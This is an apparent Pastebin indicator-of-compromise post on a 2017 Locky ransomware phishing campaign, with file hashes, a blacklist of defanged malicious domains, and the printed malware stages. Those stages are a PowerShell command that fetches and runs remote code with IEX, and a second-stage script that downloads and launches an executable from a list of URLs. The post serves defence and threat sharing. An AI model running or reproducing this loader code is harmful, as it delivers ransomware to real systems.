Advertisement
Nestor10

171102 Locky Trojan

Nov 6th, 2017
550
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.41 KB | None | 0 0
  1. Initial Payload:
  2. 4467239f46d04d20df5a6ce0195c457ba3a21bc2fa48d5d82ed13f8e8bca3305
  3. Type: base64 encoded doc file attached to phishing email
  4. Action: powershell.exe -nop -noexit -c "$sr = (new-object System.IO.StreamReader ((([System.Net.WebRequest]::Create('http://nikom[.]be/kjh765e46')).GetResponse()).GetResponseStream())).ReadToEnd();IEX $sr;"
  5.  
  6. Response:
  7. $urls = "http://internet-webshops[.]de/O77enbdGF5","http://ist-profy[.]ru/O77enbdGF5","http://lvps212-67-205-60[.]vps[.]webfusion[.]co[.]uk/O77enbdGF5","http://matternomatter[.]com/O77enbdGF5","http://m[.]monteschiavo[.]com/O77enbdGF5","http://minascriptandart[.]nl/O77enbdGF5","http://hilaryandsavio[.]com/O77enbdGF5","http://verwadirephen[.]info/p66/O77enbdGF5"
  8. $urls = $urls | Sort-Object {Get-Random}
  9. foreach($url in $urls) {
  10. Try {
  11. Write-Host $url
  12. $f = "D:\MALWARE\171102\envbit32.exe"
  13. Write-Host $f
  14. (New-Object System.Net.WebClient).DownloadFile($url, $f)
  15. Start-Process $f
  16. break
  17. } Catch {
  18.  
  19. }
  20. }
  21.  
  22. Stage 2 Payloads:
  23. 0610dae1ee563513ec9bab3ae13b0eb2ee509a791f79b6b8bbf91fd46aaca2c4
  24. 0f9ca5c555ddf4b5b29573ea1a513a69555afcfd0b1d3fa8f441bc6991bce543
  25. Type: binary executable
  26. Action: Ransomware infection (Locky)
  27.  
  28. Blacklist:
  29. nikom[.]be
  30. internet-webshops[.]de
  31. ist-profy[.]ru
  32. lvps212-67-205-60[.]vps[.]webfusion[.]co[.]uk
  33. matternomatter[.]com
  34. m[.]monteschiavo[.]com
  35. minascriptandart[.]nl
  36. hilaryandsavio[.]com
  37. verwadirephen[.]info
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement